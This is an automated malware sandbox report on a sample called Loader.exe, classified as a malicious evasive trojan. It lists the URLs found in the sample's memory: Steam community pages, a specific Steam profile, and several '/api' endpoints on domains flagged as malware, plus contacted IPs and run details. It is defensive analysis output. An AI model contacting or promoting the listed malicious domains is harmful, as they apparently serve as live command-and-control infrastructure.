                                                      https://deafeninggeh.biz/Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://wrathful-jammy.cyou/apiLoader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.valvesoftware.com/legal.htmLoader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.youtube.comLoader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.comLoader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackLoader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://awake-weaves.cyou/api#)Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englLoader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7TLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://diffuculttan.xyz/apiLoader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://s.ytimg.com;Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://steam.tv/Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=eLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEBLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://store.steampowered.com/privacy_agreement/Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://wrathful-jammy.cyou/Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://store.steampowered.com/points/shop/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://sketchfab.comLoader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lv.queniujq.cnLoader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.youtube.com/Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://store.steampowered.com/privacy_agreement/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://deafeninggeh.biz:443/apiLoader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.google.com/recaptcha/Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://checkout.steampowered.com/Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://wrathful-jammy.cyou/api=(#Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              https://immureprech.biz/api;Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              https://store.steampowered.com/;Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850362286.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://store.steampowered.com/about/Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://steamcommunity.com/my/wishlist/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://help.steampowered.com/en/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/market/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/news/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://store.steampowered.com/subscriber_agreement/Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://recaptcha.net/recaptcha/;Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/discussions/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://wrathful-jammy.cyou/api6(8Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    unknown
                                                                                                                                    https://store.steampowered.com/stats/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://immureprech.biz/apijLoader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        unknown
                                                                                                                                        https://medal.tvLoader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://broadcast.st.dl.eccdnx.comLoader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngLoader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://store.steampowered.com/steam_refunds/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com/workshop/Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://login.steampowered.com/Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbLoader.exe, 00000000.00000003.1850474497.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850362286.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/legal/Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://immureprech.biz/l#Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                      unknown
                                                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900lLoader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englLoader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://recaptcha.netLoader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://upx.sf.netAmcache.hve.3.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://effecterectz.xyz/Loader.exe, 00000000.00000003.1800647255.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800804536.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                unknown
                                                                                                                                                                                https://store.steampowered.com/Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/T#Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://wrathful-jammy.cyou/apioLoader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    unknown
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    104.21.22.222
                                                                                                                                                                                    immureprech.bizUnited States
                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    104.21.32.1
                                                                                                                                                                                    deafeninggeh.bizUnited States
                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                    23.55.153.106
                                                                                                                                                                                    steamcommunity.comUnited States
                                                                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                    Analysis ID:1574897
                                                                                                                                                                                    Start date and time:2024-12-13 18:51:07 +01:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 5m 27s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:8
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:Loader.exe
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.troj.evad.winEXE@2/5@10/3
                                                                                                                                                                                    EGA Information:Failed
